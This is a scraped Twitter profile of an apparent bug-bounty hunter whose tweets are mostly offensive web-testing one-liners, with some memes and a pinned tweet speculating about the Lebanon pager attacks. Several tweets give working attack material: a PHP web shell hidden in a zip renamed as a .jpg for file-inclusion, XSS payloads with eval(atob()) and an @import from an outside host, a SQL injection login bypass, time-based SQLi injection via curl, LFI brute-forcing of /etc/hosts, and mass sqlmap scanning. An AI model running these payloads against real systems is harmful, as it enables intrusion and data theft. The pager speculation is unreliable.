Gudetama @gudetama_bf Twitter profile

Pinned Tweet

Gudetama

20 hours

Spot the Missing Links Who we are Sofia - Bulgaria Rinson Jose #pager #walkietalkie #bacconsulting #goldapollo #nortaglobal #lebanon

BAC Consulting

@consulting_bac

20 hours

Spot the Missing Links Who we are Sofia - Bulgaria Rinson Jose #pager #walkietalkie #bacconsulting #goldapollo #nortaglobal #lebanon

0

Last Seen Profiles

@4f5u2fQ3fkLsMIG

@shonanunitedbc

@stw_pdg

@McWroter

@LibertyForA_L_L

@juudas1989

@aniketkum215

@becameLazy

@XiaoHola22

@SynergyPass

@TyrV8cqQycZbrNv

@finaro_official

@spiekey

@masolgf

@AnthonyvanAtten

@bokeplokalmalam

@feyinrd

@MikhailUC

@Sourabht2106

@samkeneko

@IAmJeffMcCulley

@bokeplokalmalam

@stw_pdg

@baile045

@yungxirst

@aniketkum215

@allisondmorrow

@ketrin_like

@stw_pdg

@marquesbds

@elijahsmithB

@MadCat_MKII

@jdanne3

@ShakuTami

@RURU04574598

@UGA_WBB

Gudetama

@gudetama_bf

7 days

Google Dork Hunt for XSS, SQLi, API vulnerabilities & hidden endpoints python dork[.]py -d "site:*target filetype:php" #bugbountytips #bugbounty

2

153

725

Gudetama

@gudetama_bf

2 months

Google Dork Hunt for XSS, SQLi, API vulnerabilities & hidden endpoints python dork[.]py -d "site:*target filetype:php" #bugbountytips #bugbounty

5

112

419

Gudetama

@gudetama_bf

4 months

OAUTH : Open Redirection List of Payloads #bugbountytips #bugbounty

5

102

393

Gudetama

@gudetama_bf

3 months

JS Recon : WaybackURLs & HTTPX waybackurls url | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} python lazyegg[.]py "{}" --js_urls --domains --ips > urls && cat urls | grep '\.' | sort -u | xargs -I{} httpx -silent -u {} -sc -title -td #bugbountytips #bugbounty

1

109

376

Gudetama

@gudetama_bf

5 months

Nuclei Template : REFLECTION Potential Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection. nuclei -t reflection[.]yaml -u target #bugbountytips #bugbounty

2

68

352

Gudetama

@gudetama_bf

4 months

JS Recon : WaybackURLs & HTTPX waybackurls url | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} python lazyegg[.]py "{}" --js_urls --domains --ips > urls && cat urls | grep '\.' | sort -u | xargs -I{} httpx -silent -u {} -sc -title -td #bugbountytips #bugbounty

2

86

353

Gudetama

@gudetama_bf

3 months

Nuclei Template : REFLECTION Potential XSS, SSRF, Cache Poisoning and Open URL Redirection, OAUTH Redirection nuclei -t reflection[.]yaml -u target #bugbountytips #bugbounty

4

94

338

Gudetama

@gudetama_bf

3 months

Arjun + KXSS Finding - Parameter - XSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss #bugbountytips #bugbounty

2

63

329

Gudetama

@gudetama_bf

4 months

JS Recon Pentest Guide Tips to find juicy info, endpoints, token, hidden files and hostnames. #bugbountytips #bugbounty

5

89

321

Gudetama

@gudetama_bf

3 months

Recursive Fuzzing with WFUZZ - finding hidden files, folders wfuzz -c -z file,wordlist -R 3 --sc 301,200 target/FUZZ #bugbountytips #bugbounty

0

54

248

Gudetama

@gudetama_bf

7 days

Recursive Fuzzing with WFUZZ - finding hidden files, folders wfuzz -c -z file,wordlist -R 3 --sc 301,200 target/FUZZ #bugbountytips #bugbounty

3

60

308

Gudetama

@gudetama_bf

4 months

Nuclei Template : REFLECTION Potential Cross-Site Scripting (XSS), CORS, Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection, OAUTH Redirection nuclei -t reflection[.]yaml -u target #bugbountytips #bugbounty

3

53

237

Gudetama

@gudetama_bf

3 months

JS Recon Pentest Guide Tips to find juicy info, endpoints, token, hidden files and hostnames. #bugbountytips #bugbounty

1

53

203

Gudetama

@gudetama_bf

5 months

2

46

193

Gudetama

@gudetama_bf

4 months

XSS - Bypassing CSP var a = document[.]querySelector('[nonce]'); #bugbountytips #bugbounty

2

38

184

Gudetama

@gudetama_bf

4 months

LazyEgg - Hunting JS Files waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips' #bugbountytips #bugbounty

2

42

166

Gudetama

@gudetama_bf

5 months

3

31

163

Gudetama

@gudetama_bf

2 months

Tools for Mobile Pentester - termux - mitmproxy - kiwi browser - foxyproxy Intercept, Modify & Replay Request HTTP Response Modification #bugbountytips #bugbounty

3

42

157

Gudetama

@gudetama_bf

4 months

JS Recon Tool : LazyEgg extract various data from a given URL, such as links, images, cookies, forms, JavaScript URLs, domains, IP addresses, leaked credentials, perform port scans and scan JavaScript files for potential issues. #bugbountytips #bugbounty

1

33

151

Gudetama

@gudetama_bf

6 months

SQLMap from Waybackurls waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/$=[^&]*$/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}" #bugbountytips #bugbounty

0

47

152

Gudetama

@gudetama_bf

4 months

Race Condition Payload newEmail : attacker[@]local newEmail : victim[@]redacted #bugbountytips #bugbounty

2

28

146

Gudetama

@gudetama_bf

2 months

Nuclei Template : REFLECTION Potential XSS, SSRF, Cache Poisoning and Open URL Redirection, OAUTH Redirection nuclei -t reflection[.]yaml -u target #bugbountytips #bugbounty

2

34

137

Gudetama

@gudetama_bf

5 months

🔎 Recursive Fuzzing with WFUZZ 💻 wfuzz -c -z file,wordlist -R 3 --sc 301,200 target/FUZZ #bugbountytips #bugbounty

2

31

136

Gudetama

@gudetama_bf

4 months

LazyEgg extracts links, images, cookies, forms, JS URLs, localStorage, Host, IP, and leaked credentials from target. cat target | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips --links --images' #bugbountytips #bugbounty

2

31

125

Gudetama

@gudetama_bf

5 months

SQL Injection Login Bypass Payload : 1' OR 1=1 # #bugbountytips #bugbounty

2

13

124

Gudetama

@gudetama_bf

5 months

SQLMap Time Based - Cookie / Header GET /menu HTTP/1.1 Host: redacted Cookie: session-name=xyz; HACKERMAN=*elonmusk_elonmusk%40teslacom_false_6 #bugbountytips #bugbounty

1

16

110

Gudetama

@gudetama_bf

4 months

LazyEgg extracts links, images, cookies, forms, JS URLs, localStorage, Host, IP, and leaked credentials from target. python lazyegg[.]py target #bugbountytips #bugbounty

3

32

109

Gudetama

@gudetama_bf

4 months

JS Recon - Bypass Server Security Tips: include valid header, without valid user agent, will get null 🥚 python lazyegg[.]py target/opensec[.]js -H 'user-agent: egg yolk omelet Chrome/999' --js_urls --domains --leaked_creds --oxregex #bugbountytips #bugbounty

3

13

92

Gudetama

@gudetama_bf

4 months

LazyEgg - Link Extractor extracts links, endpoints, images, and cookies #bugbountytips #bugbounty

1

18

85

Gudetama

@gudetama_bf

4 months

JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u #bugbountytips #bugbounty

2

17

81

Gudetama

@gudetama_bf

2 months

Google Dork, Web Archive, WaybackURLS Finding endpoints for XSS, SQLi, IDOR. python dork[.]py -d "site:*target ext:php" #bugbountytips #bugbounty

1

14

68

Gudetama

@gudetama_bf

6 days

JS Recon : WaybackURLs & HTTPX waybackurls url | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} python lazyegg[.]py "{}" --js_urls --domains --ips > urls && cat urls | grep '\.' | sort -u | xargs -I{} httpx -silent -u {} -sc -title -td #bugbountytips #bugbounty

7

79

329

Gudetama

@gudetama_bf

4 months

LazyEgg Tool - links - images - cookies - forms - URLs, domains & IP - localStorage - leaked creds - JS File Fuzzing cat jsurls | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips --leaked_creds' #bugbountytips #bugbounty

1

7

54

Gudetama

@gudetama_bf

4 months

Yeay !! I hacked facebook #bugbountytips #bugbounty

7

3

53

Gudetama

@gudetama_bf

6 days

Finding Hidden Parameter & Potential XSS with Arjun + KXSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss #bugbountytips #bugbounty

3

69

273

Gudetama

@gudetama_bf

6 months

@intigriti <script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs="))</script> <script>fetch("admin_portal.php")</script> <script>console.log(document.domain)</script> <style> @import '//nj.rs'; </style>

3

50

Gudetama

@gudetama_bf

2 months

Identifying and Testing IDOR on URI, Cookies, Special Headers, Body & HTTP Methods. #bugbountytips #bugbounty

0

13

49

Gudetama

@gudetama_bf

1 year

This dork tool is inspired by @bxmbn 's bug bounty tips, titled "Ultimate Tips And Tricks To Find More Cross-Site Scripting Vulnerabilities." #bugbountytips #bugbounty #bugbountytips

GitHub - schooldropout1337/dork

Contribute to schooldropout1337/dork development by creating an account on GitHub.

github.com

2

6

34

Gudetama

@gudetama_bf

7 months

@intigriti 1 - if cookies are reflected into body. eg: search history (search bar) turn into cookies. 2 - read every js; use devtools and find keyword 3 - parameter miner (web cache vulnerability scanner by hackmanit) 4 - prototype pollution rdctd/?__proto__[0]=1 rdctd/ #__proto__ [0]=1

2

27

Gudetama

@gudetama_bf

5 months

Download Nuclei Template on Github

nuclei-templates/reflection.yaml at main · schooldropout1337/nuclei-templates

Contribute to schooldropout1337/nuclei-templates development by creating an account on GitHub.

github.com

2

3

27

Gudetama

@gudetama_bf

6 months

@intigriti 1 - wfuzz -c -w subdomains -u --sc 200,301,302,307,401,500,501 -Z 2 - subfinder -d target 3 - waybackurls target | grep -oP '(?<=://)[^/?]+' | sort | awk '!seen[$0]++'

0

4

26

Gudetama

@gudetama_bf

3 months

nuclei-templates/reflection.yaml at main · schooldropout1337/nuclei-templates

Contribute to schooldropout1337/nuclei-templates development by creating an account on GitHub.

github.com

0

10

23

Gudetama

@gudetama_bf

4 months

JS Fuzzing - LazyEgg python lazyegg[.]py --js_scan --w wordlist[.]txt target/js #bugbountytips #bugbounty

1

5

21

Gudetama

@gudetama_bf

6 months

@intigriti 1 - xss, sqli 2 - search regex for cookie, localStorage,graphql, api, token in devtools 3 - curl a dummy request, replace header (origin,referer,host,etc) with localhost/127.0.0.1/internal.target 4 - create account , replace POST with DEL,PATCH,PUT 5 - arjun for hidden param

2

0

22

Gudetama

@gudetama_bf

4 months

JS Recon - LazyEgg Extracting Endpoints from Dynamic App cat jsurls[.]txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips --leaked_creds --local_storage' #bugbountytips #bugbounty

1

8

19

Gudetama

@gudetama_bf

4 months

@0x0SojalSec Video QR Code SQL Injection

How Are QR Codes Hacked? SQL Injections

This video explains the meaning and functionality of QR codes, which have become an essential part of our lives. However, are they safe for users? Subscribe...

www.youtube.com

0

6

18

Gudetama

@gudetama_bf

7 months

@intigriti Chain 2-3 bugs/findings if possible, 1 - xss + api request that leaks user cred 2 - idor + blind xss 3 - avoid using alert(), escalate to full blown xss 4 - find gadgets for further exploitation 5 - keep up to date on new added assets/modules on program

0

2

17

Gudetama

@gudetama_bf

7 months

Bypassing CSP Payload #bugbountytips #bugbounty #javascript #malware #bugbountytip #technews #infosecurity #tryhackme #intigriti #hackerone #bugcrowd

0

7

15

Gudetama

@gudetama_bf

2 months

JS Recon Pentest Guide Tips to find juicy info, token, endpoints, hidden files and hostnames. #bugbounty #bugbountytips

1

4

15

Gudetama

@gudetama_bf

4 months

JavaScript Web Security 101 Alice versus Bob #infosec #cybersec #bugbountytips

Javascript Web Security — LazyEgg

Javascript Web Security —

medium.com

0

8

13

Gudetama

@gudetama_bf

4 months

Download Reflection Nuclei Template

nuclei-templates/reflection.yaml at main · schooldropout1337/nuclei-templates

Contribute to schooldropout1337/nuclei-templates development by creating an account on GitHub.

github.com

0

5

14

Gudetama

@gudetama_bf

2 months

Penetration Testing for Beginners PUT /user/123/profile HTTP/1.1 Host: example[.]com Content-Type: application/json { "email": "user%40sixty[.]com" } #bugbountytips #bugbounty

2

5

14

Gudetama

@gudetama_bf

7 days

GitHub - schooldropout1337/dork

Contribute to schooldropout1337/dork development by creating an account on GitHub.

github.com

1

5

21

Gudetama

@gudetama_bf

4 months

Yeay !! I hacked threads #bugbountytips #bugbounty

3

1

13

Gudetama

@gudetama_bf

10 months

Gravitasi itu Bener #indonesialucu #lucu #kocak #ngakak #ngakakkocak #memelucu #dagelan #memekocak #videolucu #meme #indonesia #ngakakkocakvideo #memeindonesia #memeindo #memelucuindonesia #ngakakbanget #asupanmeme #memes #ngakak #capres #pemilu2024

6

1

13

Gudetama

@gudetama_bf

3 months

Download Arjun & KXSS

GitHub - s0md3v/Arjun: HTTP parameter discovery suite.

HTTP parameter discovery suite. Contribute to s0md3v/Arjun development by creating an account on GitHub.

github.com

0

2

12

Gudetama

@gudetama_bf

5 months

JWT by JWT Tool - decode jwt token - crack password - tamper data #bugbountytips #bugbounty

2

12

Gudetama

@gudetama_bf

2 months

GitHub - schooldropout1337/dork

Contribute to schooldropout1337/dork development by creating an account on GitHub.

github.com

0

4

10

Gudetama

@gudetama_bf

6 months

@intigriti 1 - Gather Parameters from wayback waybackurls target | grep -Eo '\b[^=&?]+\=[^&?]+' | awk -F= '{print $1}' | sort -u 2 - Bruteforce LFI xargs -I{} httpx -silent -path "?{}=/../../../../../../../../etc/hosts" -u target

2

0

11

Gudetama

@gudetama_bf

5 months

Part 2 cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "'{}'"' Tips : Combine Part 1 && Part 2 #bugbountytips #bugbounty

0

11

Gudetama

@gudetama_bf

6 months

<Param Mining> echo "target" | gau | sort -u | xargs -P 1 -I {} sh -c 'echo "param mining => {}" && arjun -u "{}" -m HEADERS' echo "target" | gau | sort -u | xargs -P 1 -I {} sh -c 'echo "param mining => {}" && arjun -u "{}" -m POST' #bugbountytips #bugbountytip

1

10

Gudetama

@gudetama_bf

4 months

Article

CSP, Nonce and the XSS-cape

Hey there, fellow cyber voyagers! Today, we’re diving deep into the realm of web security, where the battle between good and evil plays out…

medium.com

0

9

Gudetama

@gudetama_bf

1 year

Bug Bounty Tips : Information Disclosure & Sensitive Data Exposure | Email Exposure via Waybackurls #bugbountytips #bugbountytips #bugbounty Author : @bug_x_hunter

1

9

Gudetama

@gudetama_bf

6 days

JS Recon Pentest Guide Tips to find juicy info, endpoints, token, hidden files and hostnames. #bugbountytips #bugbounty

1

18

113

Gudetama

@gudetama_bf

5 months

@intigriti 1 - portswigger 2 - re run php/nodejs/python code by extracting (text from images) intigriti's xss, regex, etc on hostinger and localhost 3 - mxss, xss, html injection, regex bypass, javascript challenges by @joaxcar , @kevin_mizu , @terjanq 4 - chat[.]hackerai[.]co

0

1

9

Gudetama

@gudetama_bf

4 months

LazyEgg

GitHub - schooldropout1337/lazyegg

Contribute to schooldropout1337/lazyegg development by creating an account on GitHub.

github.com

0

8

Gudetama

@gudetama_bf

7 months

SQL Injection with QR Code #bugbountytips #bugbounty #javascript #malware #bugbountytip #technews #infosecurity #tryhackme #intigriti #hackerone #bugcrowd

1

0

8

Gudetama

@gudetama_bf

3 months

GitHub - schooldropout1337/lazyegg

Contribute to schooldropout1337/lazyegg development by creating an account on GitHub.

github.com

0

1

7

Gudetama

@gudetama_bf

5 months

Use After Free Sandbox - GDB Exploit - Learn, Code, Repeat #bugbountytips #bugbounty

1

0

7

Gudetama

@gudetama_bf

6 months

@intigriti 1 - recon by @nahamsec 2 - full account takeover by @gregxsunday 3 - race condition by @albinowax

1

0

7

Gudetama

@gudetama_bf

4 months

0

7

Gudetama

@gudetama_bf

2 months

Arjun + KXSS Finding - Parameter - XSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss #bugbountytips #bugbounty

0

1

7

Gudetama

@gudetama_bf

5 months

@Bugcrowd

Gudetama

@gudetama_bf

5 months

🔎 Recursive Fuzzing with WFUZZ 💻 wfuzz -c -z file,wordlist -R 3 --sc 301,200 target/FUZZ #bugbountytips #bugbounty

2

31

136

0

6

Gudetama

@gudetama_bf

2 years

What is restricted shell? The restricted shell is a shell that restricts some of the capabilities available to an interactive user session, or to a shell script, running within it. #hackerone #bugbountytips #ctf #tryhackme #htb #infosec #bugbounty #unix #linux #infosecurity

0

2

6

Gudetama

@gudetama_bf

3 months

🔍

0

6

Gudetama

@gudetama_bf

3 months

Trent called Agent Bob to inform him that Eve and Mallory were denied entry into the concert hall. "Yada, yada, yada, shenanigans?" Bob responded. #police #story #bangkok #anime #darkweb

0

2

6

Gudetama

@gudetama_bf

4 months

Download LazyEgg

nuclei-templates/lazyegg.py at main · schooldropout1337/nuclei-templates

Contribute to schooldropout1337/nuclei-templates development by creating an account on GitHub.

github.com

0

1

6

Gudetama

@gudetama_bf

6 months

@intigriti cant recall much, but pretty sure it was local cops whistle blower app running on SMS service that tipoff crimes & etc, I used havij during those times :3

0

6

Gudetama

@gudetama_bf

6 months

Fuzzing Tips with HTTPX cat /wordlist/subdomains | xargs -P 10 -I {} httpx -silent -mc 200,301,302,401 -u https://{}-admin admin-{} {}admin admin{} admin.{} {}.admin #bugbountytips #bugbounty

0

6

Gudetama

@gudetama_bf

1 year

🤪 Viggo Venn - One More Time 📍 #viggovenn #junglejerry #boredape #NFT #BGT #BGT2023 #BritainsGotTalent #London #Opensea #Tomorrowland2023 #EDM #Ibiza #Music #DJ #Tomorrowland 🎧

2

0

4

Gudetama

@gudetama_bf

2 months

LazyEgg is a tool for extracting links, images, cookies, forms, JavaScript URLs, localStorage, Host, IP, leaked credentials. Additionally, it includes a Chrome extension to log real-time JavaScript files as they are loaded. #bugbountytips #bugbounty

GitHub - schooldropout1337/lazyegg

Contribute to schooldropout1337/lazyegg development by creating an account on GitHub.

github.com

0

3

5

Gudetama

@gudetama_bf

6 months

@intigriti This is an interesting one: 1 - echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; 2 - zip payload.php; 3 - mv shell.jpg; 4 - target/index.php?page=zip://shell.jpg%23payload.php

0

1

5

Gudetama

@gudetama_bf

3 months

@sidharthas8962 @coffinxp7 @hexsh1dow

GitHub - schooldropout1337/lazyegg

Contribute to schooldropout1337/lazyegg development by creating an account on GitHub.

github.com

0

5

Gudetama

@gudetama_bf

5 months

CVE-2024-3400 Nuclei Template for Palo Alto PAN-OS Bugs nuclei -t CVE20243400[.]yaml -u target -V telemetry=interact-server #bugbountytips #bugbounty #CVE20243400 #nuclei

0

1

5

Gudetama

@gudetama_bf

2 months

Pentesting on mobile ? - termux - mitmproxy - curl curl --proxy http://localhost:8080 'target' intercept, modify & replay request #bugbountytips #bugbounty

2

5

Gudetama

@gudetama_bf

4 months

Read EggShop : Download LazyEgg: #bugbountytips #bugbounty

GitHub - schooldropout1337/lazyegg

Contribute to schooldropout1337/lazyegg development by creating an account on GitHub.

github.com

0

1

5

Gudetama

@gudetama_bf

4 months

Race Condition

What is the Race Condition?

A race condition in web applications can occur when two or more concurrent requests attempt to update the same resource in a way that leads…

medium.com

0

3

5

Gudetama

@gudetama_bf

1 year

ethOS Vibe - Wallpaper & Style @EthereumPhone #ethos #ethosmobile #ethereum #android #phone #pixel

ethOS Vibe - Wallpaper & Style #ethos #ethereum #phone #pixel

ethOS Mobile Vibe - Wallpaper & Style #ethos #ethereum #phone #pixel

www.youtube.com

3

5

Gudetama

@gudetama_bf

4 months

PHP : CVE-2024-4577 Researcher: @orange_8361 [Hyphen, Soft Hyphen, Minus, Dash] #bugbountytips #bugbounty #infosec #php

0

5

Gudetama

@gudetama_bf

2 years

@vxunderground Baph, dont sell us out for $$$.

1

4

Gudetama

@gudetama_bf

5 months

@technSecur PUT /user/{unique_id}[sqli] HTTP/1.1 Host: REDACTED User-Agent: foxila[sqli] Cookie: user=[sqli]; Content-Type: application/x-www-form-urlencoded name=john smith[sqli]&role=member[sqli]

1

2

4

Gudetama

@gudetama_bf

7 months

@cyberx00t @ynsmroztas fire up xss payload, then go to devtool's console. Check here how to bypass CSP

CSP, Nonce and the XSS-cape

Hey there, fellow cyber voyagers! Today, we’re diving deep into the realm of web security, where the battle between good and evil plays out…

medium.com

0

4

Gudetama

@gudetama_bf

7 days

Cristiana "Femme Fatale" Who is she? An Agent, Sleeper or Proxy? Who design the pager, walkie-talkie? Black Hat Hacker? #hacker #infosec #LebanonBlast #technews #blackhat

Cristiana Femme Fatale

In 2024, a covert operation unfolded that could easily have been drawn from the pages of a spy thriller. At the heart of this tale is BAC…

medium.com

0

4

Gudetama

@gudetama_bf

7 months

Not a valid Bug 🤔 @bluesky #bugbountytips #bluesky #bugbounty

1

0

4

Gudetama

@gudetama_bf

6 months

@intigriti Here are some additional modules or endpoints that could potentially be vulnerable to client-side template injections: 1. Comments or feedback section 2. Chat or messaging functionality 3. File uploads (if the system renders uploaded files) 4. Product descriptions or listings

2

0

4

Gudetama

@gudetama_bf

4 months

Remote Access Terminal Payload : Hertz #bugbountytips #bugbounty #clips

0

1

4

Gudetama

@gudetama_bf

5 months

kxss :

GitHub - Emoe/kxss: This a adaption of tomnomnom's kxss tool with a different output format

This a adaption of tomnomnom's kxss tool with a different output format - Emoe/kxss

github.com

0

2

4

Gudetama

@gudetama_bf

2 years

What is your Game Plan? #infosec #ethereum #binance #cryptocurrency #btc #hacker #bugbountytips #itsecurity #twitter #eth

0

1

4

Gudetama

@gudetama_bf

6 months

@0mi_cro @GodfatherOrwa Send blank email to that domain to: adminx @domain .com cc: no-reply @domain .com the idea is to get "smtp error message" with administrator or employee's email or send email asking for product review, applying for jobs and etc.

1

0

4

Gudetama

@gudetama_bf

4 months

@brics_b_bounty Tips 1. Read, Practice & Complete Labs 2. (WAF/Cloudflare/Akamai bypasses) by @KN0X55 3. Google mXss, javascript hoisting, dom cloberring, prototype pollution/poisoning 4. Follow @intigriti , read xss challenge write ups (solution notes)

What is cross-site scripting (XSS) and how to prevent it? | Web Security Academy

In this section, we'll explain what cross-site scripting is, describe the different varieties of cross-site scripting vulnerabilities, and spell out how to ...

portswigger.net

1

4